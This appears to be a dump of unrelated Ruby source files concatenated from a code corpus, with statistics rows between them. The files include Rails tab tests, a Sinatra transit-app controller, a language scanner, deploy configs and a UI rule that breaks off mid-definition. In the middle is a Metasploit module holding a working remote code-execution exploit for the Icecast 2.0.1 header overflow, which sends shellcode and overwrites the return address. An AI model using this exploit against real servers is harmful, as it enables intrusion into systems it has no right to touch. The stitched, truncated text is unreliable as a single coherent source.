# Unit tests for the tab-stack controller mixin (set_tab / current_tab /
# current_tab?), across the default namespace and custom namespaces.
class MixinTest < ActionController::TestCase
  tests MixinTestController

  def test_set_tab
    controller.set_tab :footab
    assert_equal(:footab, controller.tab_stack[:default])
  end

  def test_set_tab_with_namespace
    controller.set_tab :footab, :namespace
    assert_equal(:footab, controller.tab_stack[:namespace])
  end

  def test_set_tab_with_default_namespace
    controller.set_tab :footab, :default
    assert_equal(:footab, controller.tab_stack[:default])
  end

  def test_set_tab_with_and_without_namespace
    controller.set_tab :firsttab
    controller.set_tab :secondtab, :custom
    assert_equal(:firsttab, controller.tab_stack[:default])
    assert_equal(:secondtab, controller.tab_stack[:custom])
  end

  def test_current_tab
    controller.tab_stack[:default] = :mytab
    assert_equal(:mytab, controller.current_tab)
  end

  def test_current_tab_with_namespace
    controller.tab_stack[:namespace] = :mytab
    assert_equal(:mytab, controller.current_tab(:namespace))
  end

  def test_current_tab_with_default_namespace
    controller.tab_stack[:default] = :mytab
    assert_equal(:mytab, controller.current_tab(:default))
  end

  # BUG FIX: this method was previously also named
  # test_set_tab_with_and_without_namespace, which silently redefined (and
  # therefore disabled) the set_tab test of the same name above. It exercises
  # current_tab, so it is renamed accordingly.
  def test_current_tab_with_and_without_namespace
    controller.tab_stack[:default] = :firsttab
    controller.tab_stack[:custom] = :secondtab
    assert_equal(:firsttab, controller.current_tab(:default))
    assert_equal(:secondtab, controller.current_tab(:custom))
  end

  def test_current_tab_question
    controller.tab_stack[:default] = :mytab
    assert( controller.current_tab?(:mytab))
    assert(!controller.current_tab?(:yourtab))
  end

  def test_current_tab_question_with_namespace
    controller.tab_stack[:custom] = :mytab
    assert( controller.current_tab?(:mytab, :custom))
    assert(!controller.current_tab?(:yourtab, :custom))
  end

  def test_current_tab_question_with_default_namespace
    controller.tab_stack[:default] = :mytab
    assert( controller.current_tab?(:mytab, :default))
    assert(!controller.current_tab?(:yourtab, :default))
  end

  def test_current_tab_question_with_and_without_namespace
    controller.tab_stack[:default] = :firsttab
    controller.tab_stack[:custom] = :secondtab
    assert( controller.current_tab?(:firsttab, :default))
    assert(!controller.current_tab?(:secondtab, :default))
    assert( controller.current_tab?(:secondtab, :custom))
    assert(!controller.current_tab?(:firsttab, :custom))
  end
end
# Functional-test fixture controller: declares tabs with :only filters, a
# namespaced tab, and a custom builder (BlockBuilder) used by the views.
class WorkingMixinTestController < ActionController::Base

  def self.controller_name; "working"; end
  def self.controller_path; "working"; end

  layout false

  set_tab :dashboard
  set_tab :welcome, :only => %w( action_welcome )
  set_tab :dashboard, :only => %w( action_namespace )
  set_tab :homepage, :namespace, :only => %w( action_namespace )

  def action_dashboard
    execute("action_dashboard")
  end

  def action_namespace
    execute("action_namespace")
  end

  def action_welcome
    execute("action_welcome")
  end

  private

  # For any action_* method, renders params[:template] (default 'default').
  def execute(method)
    if method.to_s =~ /^action_(.*)/
      render :action => (params[:template] || 'default')
    end
  end

  # Builder that marks the current tab with a "current" CSS class, renders
  # non-current tabs as links, and appends any captured block content.
  class BlockBuilder < TabsOnRails::Tabs::TabsBuilder
    def tab_for(tab, name, options, item_options = {}, &block)
      item_options[:class] = item_options[:class].to_s.split(" ").push("current").join(" ") if current_tab?(tab)
      content = @context.link_to_unless(current_tab?(tab), name, options) do
        @context.content_tag(:span, name)
      end
      content += @context.capture(&block) if block_given?
      @context.content_tag(:li, content, item_options)
    end
  end
end
# Functional tests: rendered tab markup for the default builder and custom
# templates/options, plus set_tab behavior with :only filters and namespaces.
class WorkingMixinTest < ActionController::TestCase
  tests WorkingMixinTestController

  def test_render_default
    get :action_dashboard
    assert_dom_equal(%Q{<ul>
      <li class="current"><span>Dashboard</span></li>
      <li><a href="/w">Welcome</a></li>
    </ul>}, @response.body)
  end

  def test_render_with_open_close_tabs
    get :action_dashboard, :template => "with_open_close_tabs"
    assert_dom_equal(%Q{<ul id="tabs">
      <li class="current"><span>Dashboard</span></li>
      <li><a href="/w">Welcome</a></li>
    </ul>}, @response.body)
  end

  def test_render_with_item_options
    get :action_dashboard, :template => "with_item_options"
    assert_dom_equal(%Q{<ul id="tabs">
      <li class="custom current"><span>Dashboard</span></li>
      <li class="custom"><a href="/w">Welcome</a></li>
    </ul>}, @response.body)
  end

  def test_render_with_item_block
    get :action_dashboard, :template => "with_item_block"
    assert_dom_equal(%Q{<ul>
      <li class="custom current"><span>Dashboard</span></li>
      <li class="custom"><a href="/w">Welcome</a>
      <img src="#image" />
    </li></ul>}, @response.body)
  end

  def test_render_with_option_active_class
    get :action_dashboard, :template => "with_option_active_class"
    assert_dom_equal(%Q{<ul id="tabs">
      <li class="active"><span>Dashboard</span></li>
      <li><a href="/w">Welcome</a></li>
    </ul>}, @response.body)
  end

  def test_set_tab
    get :action_dashboard
    assert_equal(:dashboard, controller.current_tab)
    assert_equal(:dashboard, controller.current_tab(:default))
    assert_dom_equal(%Q{<ul>
      <li class="current"><span>Dashboard</span></li>
      <li><a href="/w">Welcome</a></li>
    </ul>}, @response.body)
  end

  def test_set_tab_with_only_option
    get :action_welcome
    assert_equal :welcome, controller.current_tab
    assert_equal :welcome, controller.current_tab(:default)
    assert_dom_equal(%Q{<ul>
      <li><a href="/d">Dashboard</a></li>
      <li class="current"><span>Welcome</span></li>
    </ul>}, @response.body)
  end

  # The :namespace tab must not affect the default-namespace rendering.
  def test_set_tab_with_namespace
    get :action_namespace
    assert_equal :dashboard, controller.current_tab
    assert_equal :dashboard, controller.current_tab(:default)
    assert_equal :homepage, controller.current_tab(:namespace)
    assert_dom_equal(%Q{<ul>
      <li class="current"><span>Dashboard</span></li>
      <li><a href="/w">Welcome</a></li>
    </ul>}, @response.body)
  end

  def test_current_tab
    get :action_dashboard
    assert_equal :dashboard, controller.current_tab
    assert_equal :dashboard, controller.current_tab(:default)
  end

  def test_current_tab_question
    get :action_dashboard
    assert controller.current_tab?(:dashboard)
    assert controller.current_tab?(:dashboard, :default)
    assert !controller.current_tab?(:foobar)
    assert !controller.current_tab?(:foobar, :default)
  end
end
# View-level tests for the tabs_tag helper: custom builders, namespaces, and
# builders whose open/close boundaries are nil or only partially defined.
class ControllerMixinHelpersTest < ActionView::TestCase
  tests TabsOnRails::ActionController::HelperMethods

  include ActionView::Helpers::TagHelper
  include ActionView::Helpers::UrlHelper

  # Builder whose construction is observable via #checkpoint (mocked below).
  MockBuilder = Class.new(TabsOnRails::Tabs::Builder) do
    def initialize_with_mocha(*args)
      checkpoint
      initialize_without_mocha(*args)
    end
    alias_method_chain :initialize, :mocha

    def checkpoint
    end

    def tab_for(tab, name, *args)
    end
  end

  # Builder with neither an open nor a close boundary.
  NilBoundariesBuilder = Class.new(TabsOnRails::Tabs::Builder) do
    def tab_for(tab, name, *args)
      @context.content_tag(:span, name)
    end
  end

  # Builder with only a close boundary defined.
  NilOpenBoundaryBuilder = Class.new(NilBoundariesBuilder) do
    def close_tabs(options = {})
      '<br />'
    end
  end

  # Builder with only an open boundary defined.
  NilCloseBoundaryBuilder = Class.new(NilBoundariesBuilder) do
    def open_tabs(options = {})
      '<br />'
    end
  end

  def test_tabs_tag_should_raise_local_jump_error_without_block
    assert_raise(LocalJumpError) { tabs_tag }
  end

  def test_tabs_tag_with_builder
    MockBuilder.any_instance.expects(:checkpoint).once
    tabs_tag(:builder => MockBuilder) { "" }
  end

  def test_tabs_tag_with_namespace
    MockBuilder.any_instance.expects(:checkpoint).once
    tabs_tag(:builder => MockBuilder, :namespace => :custom) do |tabs|
      builder = tabs.instance_variable_get(:'@builder')
      assert_equal(:custom, builder.instance_variable_get(:'@namespace'))
      ""
    end
  end

  def test_tabs_tag_should_not_concat_open_close_tabs_when_nil
    content = tabs_tag(:builder => NilBoundariesBuilder) do |t|
      concat t.single('Single', '#')
    end
    assert_dom_equal '<span>Single</span>', content
  end

  def test_tabs_tag_should_not_concat_open_tabs_when_nil
    content = tabs_tag(:builder => NilOpenBoundaryBuilder) do |t|
      concat t.single('Single', '#')
    end
    assert_dom_equal '<span>Single</span><br />', content
  end

  def test_tabs_tag_should_not_concat_close_tabs_when_nil
    content = tabs_tag(:builder => NilCloseBoundaryBuilder) do |t|
      concat t.single('Single', '#')
    end
    assert_dom_equal '<br /><span>Single</span>', content
  end
end
| 28.228013 | 112 | 0.718671 |
795a21d96cd2e360bd86d6a2d4a22286ffaab4f3 | 1,543 | class TagsInput < ActiveAdminAddons::InputBase
include ActiveAdminAddons::SelectHelpers
def render_custom_input
if active_record_select?
return render_collection_tags
end
render_array_tags
end
def load_control_attributes
load_data_attr(:model, value: model_name)
load_data_attr(:method, value: method)
load_data_attr(:width, default: "80%")
if active_record_select?
load_data_attr(:relation, value: true)
load_data_attr(:collection, value: collection_to_select_options, formatter: :to_json)
else
load_data_attr(:collection, value: array_to_select_options, formatter: :to_json)
end
end
private
def render_array_tags
render_tags_control { build_hidden_control(prefixed_method, method_to_input_name, input_value.is_a?(Array) ? input_value.join(',') : input_value) }
end
def render_collection_tags
render_tags_control { render_selected_hidden_items }
end
def render_tags_control(&block)
concat(label_html)
concat(block.call)
concat(builder.select(build_virtual_attr, [], {}, input_html_options))
end
def render_selected_hidden_items
template.content_tag(:div, id: selected_values_id) do
template.concat(build_hidden_control(empty_input_id, method_to_input_array_name, ""))
input_value.each do |item_id|
template.concat(
build_hidden_control(
method_to_input_id(item_id),
method_to_input_array_name,
item_id.to_s
)
)
end
end
end
end
| 27.553571 | 151 | 0.723914 |
4a4c20b3db6902d999a05966fa32c1bf38fe4ae4 | 416 | require 'simplecov'
# Repo root, resolved relative to this helper file.
cov_root = File.expand_path('..', File.dirname(__FILE__))

# Group coverage results by top-level directory (src vs test/src).
SimpleCov.start do
  #add_group('debug') { |src| print src.filename+"\n"; false }
  add_group('src') { |src|
    src.filename.start_with? "#{cov_root}/src"
  }
  add_group('test/src') { |src|
    src.filename.start_with? "#{cov_root}/test/src"
  }
end
SimpleCov.root cov_root
SimpleCov.coverage_dir ENV['CYBER_DOJO_COVERAGE_ROOT'] | 26 | 62 | 0.689904 |
bf0b0d7f2cc26bce13a7c575a8601c0373904bba | 6,047 | module TPPlus
class Scanner
def initialize
end
attr_reader :lineno, :col
attr_reader :tok_line, :tok_col
def scan_setup(src)
@src = src
@lineno = 1
@ch = " "
@offset = 0
@col = 0
@rdOffset = 0
@prevDot = false # for groups
@tok_line = 0
@tok_col = 0
self.next
end
def next
if @rdOffset < @src.length
@offset = @rdOffset
@ch = @src[@rdOffset]
if @ch == "\n"
@lineno += 1
@col = 0
end
@rdOffset += 1
@col += 1
else
@offset = @src.length
@ch = -1
end
end
def isDigit?(ch)
return false if ch == -1
case ch
when '0','1','2','3','4','5','6','7','8','9'
return true
else
return false
end
end
def isLetter?(ch)
return false if ch == -1
case ch
when 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
'_'
return true
else
return false
end
end
def skipWhitespace
while @ch == ' ' || @ch == "\t" || @ch == "\r"
self.next
end
end
def scanIdentifier
offs = @offset
while isLetter?(@ch) || isDigit?(@ch)
self.next
end
# allow one ? or ! at end
if @ch == '?' || @ch == '!'
self.next
end
return @src[offs,(@offset-offs)]
end
def scanReal
offs = @offset-1
while self.isDigit?(@ch)
self.next
end
return [:REAL, @src[offs,(@offset-offs)].to_f]
end
def scanNumber
offs = @offset
while self.isDigit?(@ch)
self.next
end
if @ch == '.'
self.next
while self.isDigit?(@ch)
self.next
end
return [:REAL, @src[offs,(@offset-offs)].to_f]
else
return [:DIGIT, @src[offs,(@offset-offs)].to_i]
end
end
def scanComment
offs = @offset-1 # opening # already consumed
while @ch != "\n" && @ch != -1
self.next
end
return @src[offs,(@offset-offs)]
end
def scanString(type)
offs = @offset
while @ch != type && @ch != -1
self.next
end
# consume close
self.next
return @src[offs, (@offset-offs-1)] # -1 to remove trailing " or '
end
def scanLabel
offs = @offset
while self.isLetter?(@ch) || isDigit?(@ch)
self.next
end
return @src[offs, (@offset-offs)]
end
# return token
def next_token
self.skipWhitespace
@tok_line = @lineno
@tok_col = @col
tok = nil
lit = ""
ch = @ch
if isLetter?(ch)
lit = self.scanIdentifier
if @ch == '['
tok = TPPlus::Token.lookup_data(lit)
elsif lit == "DIV"
tok = :DIV
else
# keywords are longer than 1 char, avoid lookup otherwise
if lit.length > 1
if @prevDot
case lit
when "gp1","gp2","gp3","gp4","gp5"
tok = :GROUP
else
tok = TPPlus::Token.lookup(lit)
end
else
tok = TPPlus::Token.lookup(lit)
end
else
tok = :WORD
end
end
elsif isDigit?(ch)
tok, lit = self.scanNumber
else
self.next # always make progress
case ch
when -1
return nil
when '='
if @ch == '='
tok = :EEQUAL
self.next
else
tok = :EQUAL
end
when ':'
if @ch == "="
tok = :ASSIGN
self.next
else
tok = :COLON
end
when "<"
if @ch == "="
tok = :LTE
self.next
elsif @ch == ">"
tok = :NOTEQUAL
self.next
else
tok = :LT
end
when ">"
if @ch == "="
tok = :GTE
self.next
else
tok = :GT
end
when "+"
tok = :PLUS
when "-"
tok = :MINUS
when "*"
tok = :STAR
when "/"
tok = :SLASH
when "&"
if @ch == "&"
tok = :AND
self.next
elsif isLetter?(@ch)
tok = :ADDRESS
lit = self.scanIdentifier
else
tok = :ILLEGAL
end
when "|"
if @ch == "|"
tok = :OR
self.next
else
tok = :ILLEGAL
end
when "%"
tok = :MOD
when ";"
tok = :SEMICOLON
when "."
if self.isDigit?(@ch)
tok, lit = self.scanReal
else
tok = :DOT
end
when "!"
if @ch == "="
tok = :NOTEQUAL
self.next
else
tok = :BANG
end
when "\"", "'"
tok = :STRING
lit = self.scanString(ch)
when "#"
tok = :COMMENT
lit = self.scanComment
when "@"
tok = :LABEL
lit = self.scanLabel
when '('
tok = :LPAREN
when ')'
tok = :RPAREN
when ','
tok = :COMMA
when '['
tok = :LBRACK
when ']'
tok = :RBRACK
when '{'
tok = :LBRACE
when '}'
tok = :RBRACE
when "\n"
tok = :NEWLINE
when '$'
tok = :SYSTEM
else
tok = :ILLEGAL
lit = ch
end
end
if tok == :DOT
@prevDot = true
else
@prevDot = false
end
return [tok, lit]
end
end
class ScanError < StandardError ; end
end
| 20.291946 | 115 | 0.401356 |
1852d3982046c8c1b315699962852494ae1a4d98 | 3,079 | require './config/environment'
require 'sinatra/flash'
# Sinatra base controller: session/flash configuration, error pages, the
# root route, and shared helpers for the MARTA train API and quick picks.
class ApplicationController < Sinatra::Base

  configure do
    set :public_folder, 'public'
    set :views, 'app/views'
    enable :sessions
    set :session_secret, ENV['SESSION_SECRET']
    register Sinatra::Flash
    set :show_exceptions, false
  end

  # Friendly pages for client (4xx) and server (5xx) error statuses.
  error 400...500 do
    erb :'/errors/400_error'
  end

  error 500...512 do
    erb :'/errors/500_error'
  end

  get "/" do
    if logged_in?
      redirect '/quick_picks'
    else
      erb :mainpage
    end
  end

  error ActiveRecord::RecordNotFound do
    redirect '/'
  end

  helpers do
    #-------------user verifications----------------------
    def logged_in?
      !!session[:user_id]
    end

    def current_user
      @current_user ||= User.find_by_id(session[:user_id])
    end

    #--------------Marta API Methods--------------------
    # Memoized list of train hashes from the MARTA API for this request.
    def all_trains
      @all_trains ||= MartaAPIImporter.new.train_api_call
    end

    def all_unique_stations_from_all_trains
      all_trains.collect{|train| train['STATION']}.uniq.sort
    end

    #array of train hashes that have the current station as a destination
    def array_from_station_name
      all_trains.select{|obj| obj['STATION'] == current_quick_pick.station_name}
    end

    #array of directions based on array given from array_from_station_name method
    def collect_all_directions_for_current_station
      array_from_station_name.collect{|train| train['DIRECTION']}.uniq.sort
    end

    # Filter incoming trains by the quick pick's direction and/or rail line,
    # falling back to the unfiltered station list when neither is set.
    def incoming_trains_based_on_direction_and_or_rail_line
      @trains ||=
        if current_quick_pick.direction.nil? && current_quick_pick.rail_line_name.nil?
          array_from_station_name
        elsif !current_quick_pick.direction.nil? && !current_quick_pick.rail_line_name.nil?
          array_from_station_name.select{|obj| obj['DIRECTION'] == current_quick_pick.direction}.select{|train| train['LINE'] == current_quick_pick.rail_line_name}
        elsif current_quick_pick.direction
          array_from_station_name.select{|obj| obj['DIRECTION'] == current_quick_pick.direction}
        elsif current_quick_pick.rail_line_name
          array_from_station_name.select{|obj| obj['LINE'] == current_quick_pick.rail_line_name}
        end
    end

    #----------Quick Pick methods-----------------
    def current_quick_pick
      @current_quick_pick ||= QuickPick.find(params[:id])
    end
  end

  private

  def redirect_if_not_logged_in
    if !logged_in?
      flash[:message] = "You're not logged in!"
      redirect to '/users/log_in'
    end
  end

  # NOTE(review): create_quick_pick is not defined in this class — presumably
  # provided by a subclass or another file; verify before relying on it.
  def redirect_if_cant_create_quick_pick
    if !create_quick_pick
      flash[:message] = "Could not create quick pick."
      redirect '/quick_picks'
    end
  end

  # NOTE(review): compare_user_and_quick_pick_owner is defined elsewhere.
  def redirect_if_user_is_not_qp_owner
    if !compare_user_and_quick_pick_owner
      redirect '/quick_picks'
    end
  end

  # NOTE(review): valid_direction_and_or_rail_line is defined elsewhere.
  def redirect_has_invalid_direction_or_rail_line
    if !valid_direction_and_or_rail_line
      redirect '/quick_picks'
    end
  end
end
| 25.87395 | 167 | 0.662553 |
21351bca2d23add4ae97f028cc438bf48dd1d5d5 | 2,839 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
# Remote exploit module for the Icecast <= 2.0.1 HTTP header-parsing
# overflow (CVE-2004-1561) on win32 targets.
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Icecast (<= 2.0.1) Header Overwrite (win32)',
      'Description' => %q{
        This module exploits a buffer overflow in the header parsing
        of icecast, discovered by Luigi Auriemma. Sending 32 HTTP
        headers will cause a write one past the end of a pointer
        array. On win32 this happens to overwrite the saved
        instruction pointer, and on linux (depending on compiler,
        etc) this seems to generally overwrite nothing crucial (read
        not exploitable).

        !! This exploit uses ExitThread(), this will leave icecast
        thinking the thread is still in use, and the thread counter
        won't be decremented. This means for each time your payload
        exits, the counter will be left incremented, and eventually
        the threadpool limit will be maxed. So you can multihit,
        but only till you fill the threadpool.
      },
      'Author' => [ 'spoonm', 'Luigi Auriemma <aluigi[at]autistici.org>' ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision$',
      'References' =>
        [
          [ 'CVE', '2004-1561'],
          [ 'OSVDB', '10406'],
          [ 'BID', '11271'],
          [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html'],
        ],
      'Privileged' => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload' =>
        {
          'Space' => 2000,
          'BadChars' => "\x0d\x0a\x00",
          'DisableNops' => true,
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Automatic', { }],
        ],
      'DisclosureDate' => 'Sep 28 2004',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(8000)
      ], self.class)
  end

  # Interesting that ebp is pushed after the local variables, and the line array
  # is right before the saved eip, so overrunning it just by 1 element overwrites
  # eip, making an interesting exploit....
  # .text:00414C00                 sub     esp, 94h
  # .text:00414C06                 push    ebx
  # .text:00414C07                 push    ebp
  # .text:00414C08                 push    esi
  def exploit
    connect

    # bounce bounce bouncey bounce.. (our chunk gets free'd, so do a little dance)
    # jmp 12
    evul = "\xeb\x0c / HTTP/1.1 #{payload.encoded}\r\n"
    # 31 extra headers + the request line above = 32 entries, one past the array
    evul << "Accept: text/html\r\n" * 31;
    # jmp [esp+4]
    evul << "\xff\x64\x24\x04\r\n"
    evul << "\r\n"

    sock.put(evul)
    handler
    disconnect
  end
end
| 27.833333 | 82 | 0.611483 |
bb8bbeb3d17d244f8baf23ebe7e49028bfe2c765 | 1,841 | # config valid for current version and patch releases of Capistrano
set :application, "contentsearch"
set :repo_url, "https://github.com/sul-dlss/content_search.git"

# Default branch is :master
ask :branch, proc { `git rev-parse --abbrev-ref HEAD`.chomp }.call unless ENV['DEPLOY']

# Default deploy_to directory is /var/www/my_app_name
set :deploy_to, "/opt/app/contentsearch/contentsearch"

# Default value for :format is :airbrussh.
# set :format, :airbrussh

# You can configure the Airbrussh format using :format_options.
# These are the defaults.
# set :format_options, command_output: true, log_file: "log/capistrano.log", color: :auto, truncate: :auto

# Default value for :pty is false
# set :pty, true

# Default value for :linked_files is []
# Lazy lambda so fetch(:rails_env) resolves at deploy time, per stage.
set :linked_files, ->{ ["config/master.key", "config/honeybadger.yml", "config/newrelic.yml", "tmp/harvest_purl_fetcher_job_last_run_#{fetch(:rails_env)}"] }

# Default value for linked_dirs is []
append :linked_dirs, "log", "tmp/pids", "tmp/cache", "tmp/sockets", "public/system", "config/settings"

# Default value for default_env is {}
# set :default_env, { path: "/opt/ruby/bin:$PATH" }

# Default value for local_user is ENV['USER']
# set :local_user, -> { `git config user.name`.chomp }

# Default value for keep_releases is 5
# set :keep_releases, 5

# Uncomment the following to require manually verifying the host key before first deploy.
# set :ssh_options, verify_host_key: :secure

# honeybadger_env otherwise defaults to rails_env
set :honeybadger_env, fetch(:stage)

# update shared_configs before restarting app
before 'deploy:restart', 'shared_configs:update'

set :whenever_roles, [:indexer]

namespace :deploy do
  # Restart all templated sidekiq systemd units after the app restarts;
  # tolerate hosts where no unit matches.
  after :restart, :restart_sidekiq do
    on roles(:app) do
      sudo :systemctl, "restart", "sidekiq-*", raise_on_non_zero_exit: false
    end
  end
end
| 33.472727 | 157 | 0.740902 |
21593762122ee68ef145fae10773288c1509f1f4 | 900 | # coding: utf-8
# Make lib/ loadable so the version constant can be required below.
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'piliponi/version'

# Gem specification for piliponi, a Philippine mobile phone number formatter.
Gem::Specification.new do |spec|
  spec.name          = "piliponi"
  spec.version       = Piliponi::VERSION
  spec.authors       = ["Ace Dimasuhid"]
  spec.email         = ["[email protected]"]
  spec.description   = %q{Philippine Mobile Phone Formatter}
  spec.summary       = %q{Mobile Phone Number Formatter for the Philippines}
  spec.homepage      = ""
  spec.license       = "MIT"

  spec.files         = `git ls-files`.split($/)
  spec.executables   = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
  spec.test_files    = spec.files.grep(%r{^(test|spec|features)/})
  spec.require_paths = ["lib"]

  spec.add_development_dependency "bundler", "~> 1.3"
  spec.add_development_dependency "rake"
  spec.add_development_dependency "rspec"
end
| 36 | 76 | 0.662222 |
1a3ff18bc4e3057ecc2fb24e4e9ee1d152881288 | 573 | class CreateQuestions < ActiveRecord::Migration[5.0]
def change
create_table :question_templates do |t|
t.integer :number
t.integer :question_type
t.integer :answers_type
t.string :title
t.string :subtitle
t.json :answers
t.json :true_answers
t.json :data
t.belongs_to :test_template
end
create_table :questions do |t|
t.integer :number
t.json :user_answers, default: {}
t.belongs_to :user
t.belongs_to :test, null: true
t.belongs_to :question_template
end
end
end
| 21.222222 | 52 | 0.643979 |
3802f676d1dae5f142f6732671d0a79e89e4856c | 182 | class ChangeContentTypeToPods < ActiveRecord::Migration[5.2]
def up
change_column :pods, :content, :text
end
def down
change_column :pods, :content, :string
end
end
| 18.2 | 60 | 0.714286 |
7ad1cd6891007bf861313c01d7b13ebe44d88dda | 325 | require 'bundler/setup'
Bundler.setup
require_relative '../lib/algorithmia.rb'
# Smoke-check helper: asserts ALGORITHMIA_API_KEY is present in the
# environment and builds a client with it.
# NOTE(review): the client is assigned but never returned or used further.
def test_client
  expect(ENV['ALGORITHMIA_API_KEY']).to_not be_nil
  client = Algorithmia.client(ENV['ALGORITHMIA_API_KEY']);
end
RSpec.configure do |config|
config.color = true
config.tty = true
config.formatter = :documentation
end | 21.666667 | 60 | 0.756923 |
bfa53cbb0ef456e8f9c5b6d8ad0fb03054519e8d | 372 | module WebmoneyHq
class Request < ApplicationRecord
validates :daterequest, uniqueness: true
has_many :items, primary_key: :daterequest, foreign_key: :daterequest, dependent: :destroy
def operations
oper = 0
self.items.each do |i|
if i.canaggregate != false
oper += i.count
end
end
oper
end
end
end
| 20.666667 | 94 | 0.63172 |
ff2b283247797c4535b78e9cf63a8cf00f5095b6 | 1,135 | # frozen_string_literal: true
# CRUD for articles. Reading (index/show) is public; all other actions
# require an authenticated user, who becomes the owner on create.
class ArticlesController < ApplicationController
  before_action :authenticate_user!, except: %i[index show]
  before_action :set_article, only: %i[show edit update destroy]

  def index
    @articles = Article.all
    respond_to do |format|
      format.html # index.html.erb
      format.json { render json: @articles }
      format.xml { render xml: @articles }
      # need activemodel-serializers-xml gem for active model objects and
      # active record models.
    end
  end

  def show; end

  def new
    @article = Article.new
  end

  def edit; end

  def create
    @article = Article.new(article_params)
    @article.user = current_user
    if @article.save
      redirect_to @article
    else
      render 'new'
    end
  end

  def update
    if @article.update(article_params)
      redirect_to @article
    else
      render 'edit'
    end
  end

  def destroy
    @article.destroy
    redirect_to root_path
  end

  private

  # Strong parameters: only title and text are mass-assignable.
  def article_params
    params.require(:article).permit(:title, :text)
  end

  # Looks the article up by its friendly_id slug.
  def set_article
    @article = Article.friendly.find(params[:id])
  end
end
| 18.606557 | 73 | 0.672247 |
9145d93aecaacc90ebfbac39a57b9f207d3daa09 | 274 | module SupportInterface
class ApplicationChoicesController < SupportInterfaceController
def show
choice = ApplicationChoice.find(params[:application_choice_id])
redirect_to support_interface_application_form_path(choice.application_form)
end
end
end
| 30.444444 | 82 | 0.813869 |
9162c068068ba9492bcef90113760915d91cbcc9 | 566 | require 'spec_helper'
# Specs for the like/unlike endpoints of GroupMe::Likes.
describe GroupMe::Likes do

  before do
    @client = GroupMe::Client.new(:token => 'TEST')
  end

  describe '.create_like' do
    it 'likes a message' do
      stub_post('/messages/3/5/like').to_return(:status => 200)
      response = @client.create_like(3, 5)
      expect(response).to eq(true)
    end
  end

  describe '.destroy_like' do
    # BUG FIX: this example was mislabelled 'likes a message' (copied from
    # the .create_like spec) even though it exercises the unlike endpoint.
    it 'unlikes a message' do
      stub_post('/messages/234/8/unlike').to_return(:status => 200)
      response = @client.destroy_like(234, 8)
      expect(response).to eq(true)
    end
  end
end
| 18.866667 | 67 | 0.637809 |
33be53ff44bfad2a7bf25768944d4234180a4ec3 | 8,250 | # frozen_string_literal: true
module UiRules
class PackingSpecificationItemRule < Base
def generate_rules
@repo = ProductionApp::PackingSpecificationRepo.new
@bom_repo = MasterfilesApp::BomRepo.new
@setup_repo = ProductionApp::ProductSetupRepo.new
make_form_object
apply_form_values
@rules[:rebin] ||= @repo.get(:product_setups, :rebin, @form_object.product_setup_id) || false
set_show_fields if %i[show].include? @mode
if %i[new edit].include? @mode
common_values_for_fields common_fields
add_behaviours
end
form_name 'packing_specification_item'
end
def set_show_fields # rubocop:disable Metrics/AbcSize
form_object_merge!(@setup_repo.find_product_setup(@form_object.product_setup_id))
form_object_merge!(@repo.extend_packing_specification(@form_object))
@form_object.to_h.each_key do |k|
fields[k] = { renderer: :label }
end
fields[:packed_tm_group] = { renderer: :label, caption: 'Packed TM Group' }
fields[:pallet_label_name] = { renderer: :label, caption: 'Pallet Label' }
fields[:pm_bom] = { renderer: :label, caption: 'PKG BOM' }
fields[:pm_mark] = { renderer: :label, caption: 'PKG Mark' }
fields[:tu_labour_product] = { renderer: :label, caption: 'TU Labour Product' }
fields[:ru_labour_product] = { renderer: :label, caption: 'RU Labour Product' }
fields[:ri_labour_product] = { renderer: :label, caption: 'RI Labour Product' }
fields[:fruit_stickers] = { renderer: :label, caption: 'Fruit Stickers' }
fields[:tu_stickers] = { renderer: :label, caption: 'TU Stickers' }
fields[:ru_stickers] = { renderer: :label, caption: 'RU Stickers' }
fields[:rebin] = { renderer: :label, as_boolean: true }
end
def common_fields # rubocop:disable Metrics/AbcSize
{
product_setup_template_id: { renderer: :select,
caption: 'Product Setup Template',
options: @setup_repo.for_select_product_setup_templates,
disabled_options: @setup_repo.for_select_inactive_product_setup_templates,
prompt: true,
required: true,
hide_on_load: @mode == :edit },
product_setup: { renderer: :label,
caption: 'Product Setup',
hide_on_load: @mode == :new },
product_setup_id: { renderer: :select,
caption: 'Product Setup',
options: @setup_repo.for_select_product_setups(
where: { product_setup_template_id: @form_object.product_setup_template_id }
),
disabled_options: @setup_repo.for_select_inactive_product_setups,
prompt: true,
required: true,
hide_on_load: @mode == :edit },
description: {},
pm_bom_id: { renderer: :select,
caption: 'PKG BOM',
options: @bom_repo.for_select_packing_spec_pm_boms(
where: { std_fruit_size_count_id: @form_object.std_fruit_size_count_id,
basic_pack_id: @form_object.basic_pack_id }
),
disabled_options: @bom_repo.for_select_inactive_pm_boms,
searchable: true,
prompt: true,
required: false },
pm_mark_id: { renderer: :select,
caption: 'PKG Mark',
options: @bom_repo.for_select_pm_marks(
where: { mark_id: @form_object.mark_id }
),
disabled_options: @bom_repo.for_select_inactive_pm_marks,
searchable: true,
prompt: true,
required: false },
tu_labour_product_id: { renderer: :select,
caption: 'TU Labour Product',
options: @bom_repo.for_select_pm_products(
where: { subtype_code: AppConst::PM_SUBTYPE_TU_LABOUR }
),
disabled_options: @bom_repo.for_select_inactive_pm_products,
prompt: true,
required: false },
ru_labour_product_id: { renderer: :select,
caption: 'RU Labour Product',
options: @bom_repo.for_select_pm_products(
where: { subtype_code: AppConst::PM_SUBTYPE_RU_LABOUR }
),
disabled_options: @bom_repo.for_select_inactive_pm_products,
prompt: true,
required: false },
ri_labour_product_id: { renderer: :select,
caption: 'RI Labour Product',
